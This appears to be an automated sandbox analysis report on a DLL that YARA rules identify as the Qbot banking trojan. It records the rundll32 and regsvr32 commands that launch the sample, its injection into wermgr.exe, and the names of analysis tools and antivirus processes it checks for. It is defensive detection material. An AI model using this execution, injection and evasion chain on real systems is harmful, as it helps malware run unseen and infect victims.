          Source: 00000008.00000000.268192549.00000000012A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000008.00000000.268192549.00000000012A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000003.00000003.261366767.0000000000590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000003.00000003.261366767.0000000000590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000009.00000002.270604125.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000009.00000002.270604125.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000005.00000003.261991952.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000005.00000003.261991952.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000009.00000000.268299338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000009.00000000.268299338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000005.00000002.268833263.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000005.00000002.268833263.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_009A29E9
          Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_009A35EE
          Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_009A82A0
          Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_009A63B0
          Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_009A676F
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_044635EE
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_044629E9
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_044682A0
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_0446676F
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_044663B0
          Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_0099D9DE GetThreadContext, NtProtectVirtualMemory, NtWriteVirtualMemory, NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_0099D538 NtCreateSection, DefWindowProcW, RegisterClassExA, CreateWindowExA, DestroyWindow, UnregisterClassA, NtMapViewOfSection, NtMapViewOfSection, VirtualAllocEx, WriteProcessMemory, lstrlenW, NtUnmapViewOfSection, NtClose
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_0445D538 NtCreateSection, DefWindowProcW, RegisterClassExA, CreateWindowExA, DestroyWindow, UnregisterClassA, NtMapViewOfSection, NtMapViewOfSection, VirtualAllocEx, WriteProcessMemory, lstrlenW, NtUnmapViewOfSection, NtClose
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_0445D9DE GetThreadContext, NtProtectVirtualMemory, NtWriteVirtualMemory, NtProtectVirtualMemory
          Source: pebbles.dat.dll.8.dr, Static PE information: No import functions for PE file found
          Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: sfc.dll
          Source: pebbles.dat.dll.8.dr, Static PE information: Data appended to the last section found
          Source: pebbles.dat.dll, ReversingLabs: Detection: 16%
          Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown, Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\pebbles.dat.dll"
          Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
          Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\pebbles.dat.dll
          Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
          Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllRegisterServer
          Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllUnregisterServer
          Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\SysWOW64\regsvr32.exe, Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,bewailable
          Source: C:\Windows\SysWOW64\regsvr32.exe, Process created: C:\Windows\System32\audiodg.exe C:\Windows\system32\AUDIODG.EXE 0x2ac
          Source: C:\Windows\SysWOW64\wermgr.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Ikoqhruop
          Source: classification engine, Classification label: mal96.troj.evad.winDLL@21/1@0/0
          Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_0099E485 CoInitializeEx, CoInitializeSecurity, CoCreateInstance, SysAllocString, CoSetProxyBlanket
          Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_0099BAF6 CreateToolhelp32Snapshot, Process32First, FindCloseChangeNotification
          Source: C:\Windows\SysWOW64\wermgr.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\{8EEC79E5-2878-4F5F-A98E-FA689CEEF067}
          Source: C:\Windows\SysWOW64\wermgr.exe, Mutant created: \Sessions\1\BaseNamedObjects\{446EBB9A-7BA4-4C43-A020-E163B2EC3F81}
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5864:120:WilError_01
          Source: C:\Windows\SysWOW64\wermgr.exe, Mutant created: \Sessions\1\BaseNamedObjects\{8EEC79E5-2878-4F5F-A98E-FA689CEEF067}
          Source: pebbles.dat.dll, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: pebbles.dat.dll, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: pebbles.dat.dll, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: pebbles.dat.dll, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: pebbles.dat.dll, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: pebbles.dat.dll, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: pebbles.dat.dll, Static PE information: DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: E:\cpp\out\out\desktop.pdb source: regsvr32.exe, 00000003.00000002.269410643.000000006D4B4000.00000080.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.269325200.000000006D4B4000.00000080.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.269366163.000000006D4B4000.00000080.00000001.01000000.00000003.sdmp, pebbles.dat.dll
          Source: Binary string: amstream.pdb source: wermgr.exe, 00000007.00000003.270246920.0000000004B21000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.269783536.0000000003761000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.270387540.0000000001081000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: amstream.pdbGCTL source: wermgr.exe, 00000007.00000003.270246920.0000000004B21000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.269783536.0000000003761000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.270387540.0000000001081000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_009AB066 push ebx; ret 3_2_009AB067
          Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_009AADB4 push cs; iretd 3_2_009AAE8A
          Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_009AAEB6 push cs; iretd 3_2_009AAE8A
          Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_009ACB95 push esi; iretd 3_2_009ACB9A
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_0446B066 push ebx; ret 4_2_0446B067
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_0446ADB4 push cs; iretd 4_2_0446AE8A
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_0446AEB6 push cs; iretd 4_2_0446AE8A
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_0446CB95 push esi; iretd 4_2_0446CB9A
          Source: pebbles.dat.dll, Static PE information: section name: .reloc6s
          Source: pebbles.dat.dll, Static PE information: section name: .hata
          Source: pebbles.dat.dll.8.dr, Static PE information: section name: .reloc6s
          Source: pebbles.dat.dll.8.dr, Static PE information: section name: .hata
          Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 3_2_0099EF38 LoadLibraryA, GetProcAddress
          Source: initial sample, Static PE information: section where entry point is pointing to: .data
          Source: initial sample, Static PE information: section name: .data entropy: 7.0153365923230595
          Source: C:\Windows\SysWOW64\wermgr.exe, File created: C:\Users\user\Desktop\pebbles.dat.dll (dropped file)

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\regsvr32.exe, Memory written: PID: 3472 base: 1353C50 value: E9 42 26 62 FF
          Source: C:\Windows\SysWOW64\rundll32.exe, Memory written: PID: 4884 base: 1353C50 value: E9 42 26 AF FF
          Source: C:\Windows\SysWOW64\rundll32.exe, Memory written: PID: 612 base: 1353C50 value: E9 42 26 F5 FF
          Source: C:\Windows\SysWOW64\rundll32.exe, Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE
          Source: wermgr.exe, 00000008.00000003.272109944.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.271989769.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.272071328.00000000037D8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
          Source: wermgr.exe, 00000008.00000003.272109944.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.271989769.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.272071328.00000000037D8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WINDUMP.EXEP
          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IMPORTREC.EXE
          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PETOOLS.EXE
          Source: wermgr.exe, 00000008.00000003.272109944.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.271989769.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.272071328.00000000037D8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PROC_ANALYZER.EXE
          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SNIFF_HIT.EXE
          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: TCPDUMP.EXE
          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WINDUMP.EXE
          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SYSANALYZER.EXE
          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXEV
          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DUMPCAP.EXE
          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WIRESHARK.EXE
          Source: wermgr.exe, 00000008.00000003.272137830.0000000005232000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FILEMON.EXE
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 | Thread sleep count: 134 > 30
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5772 | Thread sleep count: 111 > 30
          Source: C:\Windows\SysWOW64\wermgr.exe TID: 1960 | Thread sleep count: 34 > 30
          Source: C:\Windows\SysWOW64\wermgr.exe TID: 5284 | Thread sleep time: -100000s >= -30000s
          Source: C:\Windows\SysWOW64\wermgr.exe TID: 5608 | Thread sleep count: 47 > 30
          Source: C:\Windows\SysWOW64\rundll32.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_4-15168
          Source: C:\Windows\SysWOW64\regsvr32.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_3-14019
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\wermgr.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_4-11550
          Source: C:\Windows\SysWOW64\regsvr32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes graph_3-11545
          Source: C:\Windows\SysWOW64\regsvr32.exe | Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0099DDE7 GetSystemInfo,3_2_0099DDE7
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0099C123 FindFirstFileW,FindNextFileW,3_2_0099C123
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0445C123 FindFirstFileW,FindNextFileW,4_2_0445C123
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0099EF38 LoadLibraryA,GetProcAddress,3_2_0099EF38

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: unknown target: C:\Windows\System32\audiodg.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wermgr.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wermgr.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\wermgr.exe base: 9A0000
          Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\wermgr.exe base: 1353C50
          Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\wermgr.exe base: E70000
          Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\wermgr.exe base: 1353C50
          Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: 9A0000 protect: page read and write
          Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\SysWOW64\wermgr.exe base: E70000 protect: page read and write
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
          Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\wermgr.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\wermgr.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0099A1F8 GetSystemTimeAsFileTime,3_2_0099A1F8
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_0099DFC2 GetCurrentProcessId,GetLastError,GetSystemMetrics,GetVersionExA,GetWindowsDirectoryW,3_2_0099DFC2
          Source: regsvr32.exe, 00000003.00000003.262266220.000000000452F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.262272208.000000000450F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.262465589.000000000312F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: bdagent.exe
          Source: regsvr32.exe, 00000003.00000003.262266220.000000000452F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.262272208.000000000450F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.262465589.000000000312F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vsserv.exe
          Source: regsvr32.exe, 00000003.00000003.262266220.000000000452F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.262272208.000000000450F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.262465589.000000000312F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: avp.exe
          Source: regsvr32.exe, 00000003.00000003.262266220.000000000452F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.262272208.000000000450F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.262465589.000000000312F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: avgcsrvx.exe
          Source: regsvr32.exe, 00000003.00000003.262266220.000000000452F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.262272208.000000000450F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.262465589.000000000312F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mcshield.exe
          Source: regsvr32.exe, 00000003.00000003.262266220.000000000452F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.262272208.000000000450F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.262465589.000000000312F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          Source: Yara match | File source: 9.2.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.regsvr32.exe.990000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.rundll32.exe.4450000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.rundll32.exe.2ee0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.3.rundll32.exe.4430000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.0.wermgr.exe.e40000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.3.regsvr32.exe.590000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.wermgr.exe.12a0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.rundll32.exe.4450000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.3.regsvr32.exe.590000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.2.wermgr.exe.970000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.wermgr.exe.e40000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.wermgr.exe.970000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.0.wermgr.exe.970000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.3.rundll32.exe.2d60000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.3.rundll32.exe.4430000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.rundll32.exe.2ee0000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.regsvr32.exe.990000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.wermgr.exe.e40000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.3.rundll32.exe.2d60000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.wermgr.exe.12a0000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000002.270568639.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.269061857.0000000004450000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.268101186.0000000000E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000003.261746477.0000000004430000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000000.268192549.00000000012A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000003.261366767.0000000000590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.270604125.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000003.261991952.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000000.268299338.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
